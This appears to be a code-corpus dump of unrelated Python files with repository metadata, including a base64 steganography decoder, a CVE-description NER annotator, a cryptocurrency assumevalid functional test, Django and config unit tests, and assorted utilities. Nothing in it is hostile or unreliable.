# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'simple_mlopsappdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'simple_mlopsapp.tex',
u'wineqdvc Documentation',
u"Your name (or your organization/company/team)", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'simple_mlopsapp', u'wineqdvc Documentation',
[u"Your name (or your organization/company/team)"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'simple_mlopsapp', u'wineqdvc Documentation',
u"Your name (or your organization/company/team)", 'wineqdvc',
'mlops implementataion of wine quality predicition using dvc', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 32.310204 | 85 | 0.709197 |
79463cd47a9c84d7a471016812bdf6cbf5e7e76b | 1,537 | py | Python | base64stego.py | itungsten/miscScripts | c43378247525a2b8a48b906b3a19cf9847e4c845 | [
"MIT"
] | null | null | null | base64stego.py | itungsten/miscScripts | c43378247525a2b8a48b906b3a19cf9847e4c845 | [
"MIT"
] | null | null | null | base64stego.py | itungsten/miscScripts | c43378247525a2b8a48b906b3a19cf9847e4c845 | [
"MIT"
] | null | null | null | # stego.txt is the file containing the base64 stego strings to be decoded
# One base64 string per line; any single line may carry no hidden data
f = open('stego.txt','r')
import re
import base64
b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
base64str = f.readline()
# pattern2 matches the character right before '==' (two padding characters)
# pattern1 matches the character right before '=' (one padding character)
pattern2 = r'(\S)==$'
pattern1 = r'(\S)=$'
# extracted hidden bits are appended to binstring
binstring = ''
# read the stego base64 strings line by line and process each one
while(base64str):
    # try the two-equals case first; if it does not match, try the one-equals case
    # a line without padding hides nothing and needs no processing
    if re.compile(pattern2).findall(base64str):
        # mstr is the character before the padding; it holds the hidden bits
        mstr = re.compile(pattern2).findall(base64str)[0]
        # look up the 6-bit base64 value of mstr as a binary string, assign to mbin
        mbin = bin(b64chars.find(mstr))
        # mbin looks like 0b100; mbin[0:2] is the '0b' prefix
        # mbin[2:].zfill(6) left-pads the bits after '0b' with zeros to a width of 6
        mbin2 = mbin[0:2] + mbin[2:].zfill(6)
        # with two padding characters, 4 bits are hidden, so take the last 4 bits of mbin2
        # and assign them to stegobin; this is the hidden binary data
        stegobin = mbin2[-4:]
        binstring += stegobin
    elif re.compile(pattern1).findall(base64str):
        mstr = re.compile(pattern1).findall(base64str)[0]
        mbin = bin(b64chars.find(mstr))
        mbin2 = mbin[0:2] + mbin[2:].zfill(6)
        # with one padding character, 2 bits are hidden, so take the last 2 bits of mbin2
        stegobin = mbin2[-2:]
        binstring += stegobin
    base64str = f.readline()
# binstring now concatenates the hidden bits from every line
# decode 8 bits at a time starting from bit 0, hence the step of 8
for i in range(0,len(binstring),8):
    # int(x, 2) converts the bit string to an integer; chr() turns it into a character
    print(chr(int(binstring[i:i+8],2)),end='') | 30.137255 | 78 | 0.657124 |
79463d3216ad735052a2a9548776c6c03cfcf02e | 1,343 | py | Python | app/core/tests/test_admin.py | underdog418/django-recipe | 4007d016deaac003c11e4ab2c44aa4c78347deac | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | underdog418/django-recipe | 4007d016deaac003c11e4ab2c44aa4c78347deac | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | underdog418/django-recipe | 4007d016deaac003c11e4ab2c44aa4c78347deac | [
"MIT"
] | null | null | null | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email='[email protected]',
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='[email protected]',
password='password123',
name='Test user full name'
)
def test_users_listed(self):
"""Test that users are listed on user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""test theat the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
# /admin/core/user/1
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 31.232558 | 68 | 0.635145 |
79463ffcf1da22067bf9a2305f9c5c7001bec16b | 8,351 | py | Python | test/functional/assumevalid.py | paicoin/paicoin | 09f8029112e7a57548ee5b5202c260f8aee7f2e9 | [
"MIT"
] | 77 | 2018-07-04T14:03:42.000Z | 2021-12-19T17:11:14.000Z | test/functional/assumevalid.py | paicoin/paicoin | 09f8029112e7a57548ee5b5202c260f8aee7f2e9 | [
"MIT"
] | 89 | 2018-06-20T03:48:55.000Z | 2022-02-10T06:50:56.000Z | test/functional/assumevalid.py | paicoin/paicoin | 09f8029112e7a57548ee5b5202c260f8aee7f2e9 | [
"MIT"
] | 40 | 2018-06-15T12:59:35.000Z | 2021-12-12T15:49:56.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test logic for skipping signature validation on old blocks.
Test logic for skipping signature validation on blocks which we've assumed
valid (https://github.com/bitcoin/bitcoin/pull/9484)
We build a chain that includes an invalid signature for one of the
transactions:
0: genesis block
1: block 1 with coinbase transaction output.
2-101: bury that block with 100 blocks so the coinbase transaction
output can be spent
102: a block containing a transaction spending the coinbase
transaction output. The transaction has an invalid signature.
103-2202: bury the bad block with just over two weeks' worth of blocks
(2100 blocks)
Start three nodes:
- node0 has no -assumevalid parameter. Try to sync to block 2202. It will
reject block 102 and only sync as far as block 101
- node1 has -assumevalid set to the hash of block 102. Try to sync to
block 2202. node1 will sync all the way to block 2202.
- node2 has -assumevalid set to the hash of block 102. Try to sync to
block 200. node2 will reject block 102 since it's assumed valid, but it
isn't buried by at least two weeks' work.
"""
import time
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.key import CECKey
from test_framework.mininode import (CBlockHeader,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
NetworkThread,
NodeConn,
NodeConnCB,
msg_block,
msg_headers)
from test_framework.script import (CScript, OP_TRUE)
from test_framework.test_framework import PAIcoinTestFramework
from test_framework.util import (p2p_port, assert_equal)
class BaseNode(NodeConnCB):
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
class AssumeValidTest(PAIcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
def setup_network(self):
self.add_nodes(3)
# Start node0. We don't start the other nodes yet since
# we need to pre-mine a block with an invalid transaction
# signature so we can pass in the block hash as assumevalid.
self.start_node(0)
def send_blocks_until_disconnected(self, node):
"""Keep sending blocks to the node until we're disconnected."""
for i in range(len(self.blocks)):
try:
node.send_message(msg_block(self.blocks[i]))
except IOError as e:
assert str(e) == 'Not connected, no pushbuf'
break
def assert_blockchain_height(self, node, height):
"""Wait until the blockchain is no longer advancing and verify it's reached the expected height."""
last_height = node.getblock(node.getbestblockhash())['height']
timeout = 10
while True:
time.sleep(0.25)
current_height = node.getblock(node.getbestblockhash())['height']
if current_height != last_height:
last_height = current_height
if timeout < 0:
assert False, "blockchain too short after timeout: %d" % current_height
                timeout -= 0.25
continue
elif current_height > height:
assert False, "blockchain too long: %d" % current_height
elif current_height == height:
break
def run_test(self):
# Connect to node0
node0 = BaseNode()
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0))
node0.add_connection(connections[0])
NetworkThread().start() # Start up network handling in another thread
node0.wait_for_verack()
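        # The version/verack handshake has completed; headers and blocks can now be sent.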
# Build the blockchain
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
self.blocks = []
# Get a pubkey for the coinbase TXO
coinbase_key = CECKey()
coinbase_key.set_secretbytes(b"horsebattery")
coinbase_pubkey = coinbase_key.get_pubkey()
# Create the first block with a coinbase output to our key
height = 1
block = create_block(self.tip, create_coinbase(height, coinbase_pubkey), self.block_time)
self.blocks.append(block)
self.block_time += 1
block.solve()
# Save the coinbase for later
self.block1 = block
self.tip = block.sha256
height += 1
# Bury the block 100 deep so the coinbase output is spendable
for i in range(100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
self.blocks.append(block)
self.tip = block.sha256
self.block_time += 1
height += 1
# Create a transaction spending the coinbase output with an invalid (null) signature
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.block1.vtx[0].sha256, 0), scriptSig=b""))
tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE])))
tx.calc_sha256()
block102 = create_block(self.tip, create_coinbase(height), self.block_time)
self.block_time += 1
block102.vtx.extend([tx])
block102.hashMerkleRoot = block102.calc_merkle_root()
block102.rehash()
block102.solve()
self.blocks.append(block102)
self.tip = block102.sha256
self.block_time += 1
height += 1
# Bury the assumed valid block 2100 deep
for i in range(2100):
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.nVersion = 4
block.solve()
self.blocks.append(block)
self.tip = block.sha256
self.block_time += 1
height += 1
# Start node1 and node2 with assumevalid so they accept a block with a bad signature.
self.start_node(1, extra_args=["-assumevalid=" + hex(block102.sha256)])
node1 = BaseNode() # connects to node1
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], node1))
node1.add_connection(connections[1])
node1.wait_for_verack()
self.start_node(2, extra_args=["-assumevalid=" + hex(block102.sha256)])
node2 = BaseNode() # connects to node2
connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))
node2.add_connection(connections[2])
node2.wait_for_verack()
# send header lists to all three nodes
node0.send_header_for_blocks(self.blocks[0:2000])
node0.send_header_for_blocks(self.blocks[2000:])
node1.send_header_for_blocks(self.blocks[0:2000])
node1.send_header_for_blocks(self.blocks[2000:])
node2.send_header_for_blocks(self.blocks[0:200])
# Send blocks to node0. Block 102 will be rejected.
self.send_blocks_until_disconnected(node0)
self.assert_blockchain_height(self.nodes[0], 101)
# Send all blocks to node1. All blocks will be accepted.
for i in range(2202):
node1.send_message(msg_block(self.blocks[i]))
# Syncing 2200 blocks can take a while on slow systems. Give it plenty of time to sync.
node1.sync_with_ping(120)
assert_equal(self.nodes[1].getblock(self.nodes[1].getbestblockhash())['height'], 2202)
# Send blocks to node2. Block 102 will be rejected.
self.send_blocks_until_disconnected(node2)
self.assert_blockchain_height(self.nodes[2], 101)
if __name__ == '__main__':
AssumeValidTest().main()
| 41.547264 | 107 | 0.629505 |
794640faeb0b06ea4be50c2d13245de9618dea97 | 2,163 | py | Python | Python-toolchain/2D/png_to_v_copper_list.py | astrofra/demo-unusual-suspects | 917c9d07aeaff86cc65793219f28865e55e5dc76 | [
"MIT"
] | 8 | 2015-05-19T22:02:17.000Z | 2017-10-03T18:40:28.000Z | Python-toolchain/2D/png_to_v_copper_list.py | astrofra/demo-unusual-suspects | 917c9d07aeaff86cc65793219f28865e55e5dc76 | [
"MIT"
] | 2 | 2020-03-29T16:14:20.000Z | 2020-03-29T16:19:15.000Z | Rog-Amiga-Remake/Python-toolchain/2D/png_to_v_copper_list.py | astrofra/amiga-experiments | 07b39cdcc581cb64711eb48caa54a4d90ca47811 | [
"MIT"
] | 3 | 2017-10-11T23:50:19.000Z | 2018-07-21T16:11:29.000Z | ## png_to_copper_list.py
import png
import math
import colorsys
filename_in = ['gradient.png', 'blue_gradient.png']
filename_out = '../../Assets/vert_copper_palettes'
global fc, fh
def main():
print('png_to_vertical_copper_list')
fc = open(filename_out + '.c', 'w')
fc.write('/* Vertical copper list palettes */\n')
fc.write('\n')
fc.write('#include <exec/types.h>\n')
fc.write('#include <intuition/intuition.h>\n')
fc.write('\n')
fh = open(filename_out + '.h', 'w')
fh.write('/* Vertical copper list palettes (headers) */\n')
fh.write('\n')
fh.write('#include <exec/types.h>\n')
fh.write('#include <intuition/intuition.h>\n')
fh.write('\n')
for _filename in filename_in:
print('Loading bitmap : ' + _filename)
fc.write('UWORD vertical_copper_pal_' + _filename.replace('.png', '') + '[] =\n')
fc.write('{\n')
fc.write('\t')
## Loads the PNG image
png_buffer = png.Reader(filename = _filename)
b = png_buffer.read()
# print(b)
## Get size & depth
w = b[0]
h = b[1]
print('w = ' + str(w) + ', h = ' + str(h))
fh.write('extern UWORD vertical_copper_pal_' + _filename.replace('.png', '') + '[' + str(w) + '];\n')
print('bitdepth = ' + str(b[3]['bitdepth']))
if b[3]['greyscale']:
print('!!!Error, cannot process a greyscale image :(')
return 0
if b[3]['bitdepth'] > 8:
print('!!!Error, cannot process a true color image :(')
return 0
original_palette = b[3]['palette']
png_out_buffer = []
prev_optimized_line_palette = []
buffer_in = list(b[2])
## For each line of the image
first_line = buffer_in[0]
for x in range(0,49):
color_idx = first_line[x]
color_val = original_palette[color_idx]
color_hex = ((color_val[0] / 16) << 8) + ((color_val[1] / 16) << 4) + (color_val[2] / 16)
color_hex = hex(color_hex)
print('color index = ' + str(color_idx) + ', color = ' + str(color_val) + ', color_hex = ' + str(color_hex))
fc.write(str(color_hex) + ',')
if ((x+1)%16) == 0:
fc.write('\n\t')
fc.write('\n')
fc.write('};\n')
fc.write('\n')
fc.close()
return 1
main() | 25.75 | 112 | 0.588534 |
7946415964c7d610a104b551b9350632a79e91f8 | 2,677 | py | Python | annotator.py | 0berry/CVE-analyzer | ba0bd71e60ba330616594df8f51ad4417d318d86 | [
"MIT"
] | 12 | 2019-05-10T07:58:30.000Z | 2021-10-19T01:39:06.000Z | annotator.py | 0berry/CVE-analyzer | ba0bd71e60ba330616594df8f51ad4417d318d86 | [
"MIT"
] | 3 | 2021-08-04T06:11:26.000Z | 2022-02-27T17:08:18.000Z | annotator.py | 0berry/CVE-analyzer | ba0bd71e60ba330616594df8f51ad4417d318d86 | [
"MIT"
] | 3 | 2019-07-25T09:35:17.000Z | 2022-03-22T10:29:32.000Z | import csv
import json
import sys
import re
import en_core_web_lg
def usage():
print 'usage: python annotator.py <path_to_dataset_in_csv> <output_file>'
def _get_annotations(desc, pattern, label):
regex = re.compile(pattern)
return [(match.start(), match.start() + len(match.group()), label) for match in regex.finditer(desc)]
# ------------------- ANNOTATION RULES -------------------
def find_functions(desc):
pattern = r'[a-zA-Z0-9]+(_[a-zA-Z0-9]+)+'
return _get_annotations(desc, pattern, "FUNCTION")
def find_kernel_version(desc):
pattern = r'\d+(\.\d+)+(-?)(\w+)?'
return _get_annotations(desc, pattern, "VERSION")
def find_file_path(desc):
pattern = r'(/)?\w+(/\w+)+\.c'
return _get_annotations(desc, pattern, "SOURCECODE")
def find_fd_driver(desc):
pattern = r'(/)?\w+(/\w+(?!\.c))+'
return _get_annotations(desc, pattern, "DRIVER")
def find_driver(desc):
pattern = r'[a-zA-Z]+\s[a-zA-Z\-]+\s(?=driver)'
return _get_annotations(desc, pattern, "DRIVER")
def find_structs(desc):
pattern = r'(?<=struct\s)\w+(\s\w+)'
return _get_annotations(desc, pattern, "STRUCT")
# ------------------- END ANNOTATION RULES -------------------
TAGGERS = [
find_functions,
find_kernel_version,
find_file_path,
find_driver,
find_structs,
find_fd_driver
]
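# Each tagger returns (start, end, label) character spans for one entity type;
# together they produce the annotations used as spaCy-style NER training data.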
def annotate_NER(dataset_file):
TRAIN_DATA = []
with open(dataset_file, 'r') as cve_dataset_f:
# cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_dataset_f:
entities = []
for tagger in TAGGERS:
entities += tagger(cve)
TRAIN_DATA += [[cve, {'entities': entities}]]
with open('annotated_{}_NER_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def annotate_DEP(dataset_file):
TRAIN_DATA = []
model = en_core_web_lg.load()
with open(dataset_file, 'r') as cve_dataset_f:
cve_reader = csv.DictReader(cve_dataset_f, delimiter=';')
for cve in cve_reader:
tagged_desc = model(unicode(cve['Avail.']))
heads = [tok.head.i for tok in tagged_desc]
deps = ['-']*len(heads)
TRAIN_DATA += [[cve['Avail.'], {'heads': heads, 'deps': deps}]]
with open('annotated_{}_DEP_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f:
json.dump(TRAIN_DATA, annotated_f)
def main(dataset_file):
annotate_NER(dataset_file)
# annotate_DEP(dataset_file)
if __name__ == '__main__':
if len(sys.argv) <= 1:
usage()
sys.exit(0)
main(sys.argv[1])
| 27.316327 | 106 | 0.615614 |
7946420b133425777c2367020fe5b937f948de9f | 721 | py | Python | modules/pseudo_rs_op.py | shahrukhqasim/HGCalML | 2808564b31c89d9b7eb882734f6aebc6f35e94f3 | [
"BSD-3-Clause"
] | null | null | null | modules/pseudo_rs_op.py | shahrukhqasim/HGCalML | 2808564b31c89d9b7eb882734f6aebc6f35e94f3 | [
"BSD-3-Clause"
] | null | null | null | modules/pseudo_rs_op.py | shahrukhqasim/HGCalML | 2808564b31c89d9b7eb882734f6aebc6f35e94f3 | [
"BSD-3-Clause"
] | null | null | null | import tensorflow as tf
def CreatePseudoRS(asso_idx, data):
    '''
    returns:
    - indices to gather_nd the data back to the original sorting
    - pseudo row splits (cumulative element counts per pseudo segment)
    - resorted data, according to the pseudo RS
    - the pseudo-RS segment index each (sorted) element belongs to
    '''
ids = tf.range(tf.shape(asso_idx)[0],dtype='int32')
args = tf.argsort(asso_idx, axis=-1)
sids = tf.expand_dims(tf.gather(ids,args),axis=1)
sasso_idx = tf.gather(asso_idx,args)
u,belongs_to_prs,c = tf.unique_with_counts(sasso_idx)
c = tf.concat([tf.zeros_like(c[0:1], dtype='int32'),c], axis=0)
sdata = tf.gather_nd(data, sids)
return tf.expand_dims(args,axis=1), tf.cumsum(c, axis=0), sdata, tf.expand_dims(belongs_to_prs,axis=1)
| 30.041667 | 106 | 0.647712 |
79464283c0c8f4ea4127782d5bdb95dd90d2c02d | 1,821 | py | Python | norms.py | ishine/AFRCNN-For-Speech-Separation | 8be8a33b87c7e294296c141c861f84736982a7c2 | [
"MIT"
] | 108 | 2021-10-06T08:42:48.000Z | 2022-03-28T09:16:14.000Z | norms.py | mtxing/AFRCNN-For-Speech-Separation | 2d2d20e23731279affd797441252e25401451f0d | [
"MIT"
] | 2 | 2022-03-16T09:20:21.000Z | 2022-03-30T12:24:11.000Z | norms.py | mtxing/AFRCNN-For-Speech-Separation | 2d2d20e23731279affd797441252e25401451f0d | [
"MIT"
] | 33 | 2021-10-11T09:00:30.000Z | 2022-03-24T12:15:42.000Z | import torch
import torch.nn as nn
class ChannelWiseLayerNorm(nn.LayerNorm):
"""
Channel wise layer normalization
"""
def __init__(self, *args, **kwargs):
super(ChannelWiseLayerNorm, self).__init__(*args, **kwargs)
def forward(self, x):
"""
x: N x C x T
"""
x = torch.transpose(x, 1, 2)
x = super().forward(x)
x = torch.transpose(x, 1, 2)
return x
class GlobalChannelLayerNorm(nn.Module):
'''
Global Layer Normalization
'''
def __init__(self, channel_size):
super(GlobalChannelLayerNorm, self).__init__()
self.channel_size = channel_size
self.gamma = nn.Parameter(torch.ones(channel_size),
requires_grad=True)
self.beta = nn.Parameter(torch.zeros(channel_size),
requires_grad=True)
def apply_gain_and_bias(self, normed_x):
""" Assumes input of size `[batch, chanel, *]`. """
return (self.gamma * normed_x.transpose(1, -1) +
self.beta).transpose(1, -1)
def forward(self, x):
"""
x: N x C x T
"""
dims = list(range(1, len(x.shape)))
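        # statistics are taken over every non-batch dimension (channels and time),
        # which is what makes this layer norm "global" rather than channel-wise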
mean = x.mean(dim=dims, keepdim=True)
var = torch.pow(x - mean, 2).mean(dim=dims, keepdim=True)
return self.apply_gain_and_bias((x - mean) / (var + 1e-8).sqrt())
def select_norm(norm, dim):
"""
    Build the requested normalization layer.
    LN costs more memory than BN.
"""
if norm not in ["cLN", "gLN", "BN"]:
raise RuntimeError("Unsupported normalize layer: {}".format(norm))
if norm == "cLN":
return ChannelWiseLayerNorm(dim, elementwise_affine=True)
elif norm == "BN":
return nn.BatchNorm1d(dim)
else:
return GlobalChannelLayerNorm(dim) | 29.852459 | 74 | 0.572213 |
7946438fb7d5b3709913492930b2f7039896a158 | 302 | py | Python | CCC/Junior/RTE_16_J1_Board_Game.py | DestroyedEpisode/Python-Projects | d795fd3c7b471f08087ee3f4d2ecb58710687ce2 | [
"MIT"
] | null | null | null | CCC/Junior/RTE_16_J1_Board_Game.py | DestroyedEpisode/Python-Projects | d795fd3c7b471f08087ee3f4d2ecb58710687ce2 | [
"MIT"
] | null | null | null | CCC/Junior/RTE_16_J1_Board_Game.py | DestroyedEpisode/Python-Projects | d795fd3c7b471f08087ee3f4d2ecb58710687ce2 | [
"MIT"
] | null | null | null | x = ''.join(input().split())
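# The board is read as a single string; the program reports the total number of
# 'L' squares and the length of the longest consecutive run of 'L' squares.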
maximum = 0
tmp = 0
for i in range(len(x)):
if x[i] != 'L':
tmp = 0
  else:
    # an 'L' square extends the current run no matter where it sits in the row
    tmp += 1
if tmp > maximum:
maximum = tmp
print(x.count('L'), maximum)
| 14.380952 | 30 | 0.453642 |
7946439425f43bf42f95979f31147aa5638f3136 | 17,986 | py | Python | tests/test_config.py | mjmunger/PolyPyTools | 116014a47479f360ee73006d6ba3ddc7f362c7a1 | [
"MIT"
] | 7 | 2017-11-15T19:25:37.000Z | 2022-01-20T01:30:56.000Z | tests/test_config.py | DrDamnit/PolyPyTools | 116014a47479f360ee73006d6ba3ddc7f362c7a1 | [
"MIT"
] | 40 | 2020-05-19T19:46:20.000Z | 2020-11-12T16:13:55.000Z | tests/test_config.py | mjmunger/PolyPyTools | 116014a47479f360ee73006d6ba3ddc7f362c7a1 | [
"MIT"
] | null | null | null | import unittest
import os.path
import json
import copy
import site
from tempfile import NamedTemporaryFile
from tempfile import TemporaryDirectory
from unittest_data_provider import data_provider
from poly_py_tools.polypy_config import PolypyConfig
from poly_py_tools.column_mapper import ColumnMapper
from unittest.mock import patch, mock_open, Mock, MagicMock
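# Simulates filesystem state for the validation tests: a lookup table of path -> bool
# that gets wired into os.path.exists via MagicMock(side_effect=helper.lookup).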
class HelperTestValidate:
states = None
polycom_paths = ['000000000000.cfg', '000000000000-directory~.xml', "Config/applications.cfg", "Config/device.cfg",
"Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg",
"Config/reg-basic.cfg", "Config/region.cfg", "Config/sip-basic.cfg", "Config/sip-interop.cfg",
"Config/site.cfg", "Config/video.cfg", "Config/video-integration.cfg"]
def __init__(self, mock_states):
# setup default states - everything exists
default_states = {}
default_states["/etc/asterisk/sip.conf"] = True
default_states["/srv/tftp/Config"] = True
for path in self.polycom_paths:
default_states[os.path.join("/srv/tftp", path)] = True
self.states = {**default_states, **mock_states}
def lookup(self, path):
return self.states[path]
class TestConfig(unittest.TestCase):
provider_test_init = lambda: (
(['000000000000.cfg', '000000000000-directory~.xml', "Config/applications.cfg", "Config/device.cfg",
"Config/features.cfg", "Config/H323.cfg", "Config/polycomConfig.xsd", "Config/reg-advanced.cfg",
"Config/reg-basic.cfg", "Config/region.cfg", "Config/sip-basic.cfg", "Config/sip-interop.cfg",
"Config/site.cfg", "Config/video.cfg", "Config/video-integration.cfg"],),
)
@data_provider(provider_test_init)
def test_init(self, polycom_files):
config = PolypyConfig()
self.assertEqual(polycom_files, config.polycom_files)
provider_test_find_config = lambda: (
# check_paths expected_config_path
(["/path/to/current/directory", "/etc/polypy/"], "/path/to/current/directory/polypy.conf", True),
(["/path/to/current/directory", "/etc/polypy/"], "/etc/polypy/polypy.conf", True),
(["/path/to/current/directory", "/etc/polypy/"], None, False),
)
@data_provider(provider_test_find_config)
def test_find_config(self, check_paths, expected_config_path, exists):
with patch.object(os.path, "exists") as mock_os:
mock_os.side_effect = lambda path: path == expected_config_path
config = PolypyConfig()
for path in check_paths:
config.add_search_path(path)
self.assertEqual(exists, config.find())
self.assertEqual(expected_config_path, config.config_path)
@staticmethod
def create_config_tuples():
fixtures_dir = os.path.join(os.path.dirname(__file__), 'fixtures/')
base_config_path = os.path.join(fixtures_dir, "base_config.json")
with open(base_config_path) as fp:
base_config = json.load(fp)
return_tuples = ()
config1 = copy.deepcopy(base_config)
config1['config_path'] = fixtures_dir
config1['paths']['asterisk'] = os.path.join(fixtures_dir, "tests/fixtures/etc/asterisk/")
config1['paths']['tftproot'] = os.path.join(fixtures_dir, "tests/fixtures/srv/tftp/")
return_tuples = return_tuples + ((json.dumps(config1), ["/path/to/current/directory", "/etc/polypy/"],
"/path/to/current/directory/polypy.conf",),)
return return_tuples
config_fixtures = lambda: TestConfig.create_config_tuples()
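    # The data_provider decorator runs each decorated test once per tuple returned
    # by this callable.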
@data_provider(config_fixtures)
def test_load_config(self, config, check_paths, expected_config_path):
with patch("os.path") as mock_os:
with patch("builtins.open", mock_open(read_data=config)) as mock_file:
mock_os.path.exists = lambda path: path == expected_config_path
expected_config_object = json.loads(config)
assert open(expected_config_path).read() == config
mock_file.assert_called_with(expected_config_path)
config = PolypyConfig()
for path in check_paths:
config.add_search_path(path)
config.find()
config.load()
self.assertEqual(expected_config_object, config.json)
def test_add_search_path(self):
config = PolypyConfig()
config.add_search_path("/path/to/some/place")
config.add_search_path("/etc/polypy")
self.assertEqual(3, len(config.search_paths))
@data_provider(config_fixtures)
def test_write_config(self, config_string, check_paths, expected_config_path):
config = PolypyConfig()
config.json = json.loads(config_string)
f = NamedTemporaryFile(delete=False)
config.config_path = f.name
config.write()
with open(f.name, 'r') as written_config_fp:
loaded_config = json.load(written_config_fp)
self.assertEqual(json.loads(config_string), loaded_config)
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
@data_provider(config_fixtures)
def test_write_config_failure(self, config_string, check_paths, expected_config_path):
m = mock_open()
with patch("builtins.open", m):
config = PolypyConfig()
config.config = json.loads(config_string)
m.side_effect = PermissionError()
with self.assertRaises(PermissionError):
config.write()
provider_test_write_default_config = lambda: (
({"lib_path": "/var/lib/polypy", "share_path": "/usr/share/polypy/", "config_path": "/etc/asterisk/polypy.conf",
"package_path": "/usr/local/lib/python3.7/dist-packages/poly_py_tools", "server_addr": "127.0.0.1",
"paths": {"asterisk": "/etc/asterisk/", "tftproot": "/srv/tftp/"},
"dictionary": {"first": ["first", "firstname", "first name"], "last": ["last", "lastname", "last name"],
"exten": ["exten", "extension", "new extension"], "vm": ["vm", "voicemail"],
"mac": ["mac", "macaddr", "mac address", "physical address"], "email": ["email"],
"endpoint": ["device", "phone", "fax", "model"],
"cid_number": ["cid", "cname", "callerid", "Caller-ID"],
"priority": ["priority", "sort", "order by", "order"], "label": ["label"],
"did": ["contact", "direct phone", "did", "number"],
"group_dial": ["simul-ring", "group dial"], "site": ["site"]}, "csvmap": {}},),
)
@data_provider(provider_test_write_default_config)
def test_write_default_config(self, expected_config):
tmp_dir = TemporaryDirectory()
tmp_config = os.path.join(tmp_dir.name, 'polypy.conf')
config = PolypyConfig()
config.write_default_config(tmp_config)
with open(tmp_config) as fp:
actual_config = json.load(fp)
expected_config['config_path'] = tmp_config
expected_config['package_path'] = os.path.join(site.getsitepackages()[0], "poly_py_tools")
self.assertEqual(expected_config, actual_config)
tmp_dir.cleanup()
provider_test_set_path = lambda: (
("asterisk", "/current/working/directory/to/something", "/current/working/directory/to/something"),
("asterisk", "to/something", "/current/working/directory/to/something"),
("asterisk", ".", "/current/working/directory"),
("tftproot", "/current/working/directory/to/something", "/current/working/directory/to/something"),
("tftproot", "to/something", "/current/working/directory/to/something"),
("tftproot", ".", "/current/working/directory"),
)
@data_provider(provider_test_set_path)
def test_set_path(self, path, target_path, expected_path):
configs = {}
configs['paths'] = {}
configs['paths']['asterisk'] = ""
configs['paths']['tftproot'] = ""
f = NamedTemporaryFile(delete=False)
with patch.object(os, 'getcwd', return_value="/current/working/directory") as mock_os:
config = PolypyConfig()
config.config_path = f.name
config.json = configs
config.set_path(path, target_path)
self.assertEqual(expected_path, config.json['paths'][path])
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
def test_set_server(self):
configs = {}
configs['server_addr'] = ""
f = NamedTemporaryFile(delete=False)
config = PolypyConfig()
config.json = configs
config.config_path = f.name
config.set_server("test.example.org")
os.unlink(f.name)
self.assertFalse(os.path.exists(f.name))
self.assertEqual("test.example.org", config.json['server_addr'])
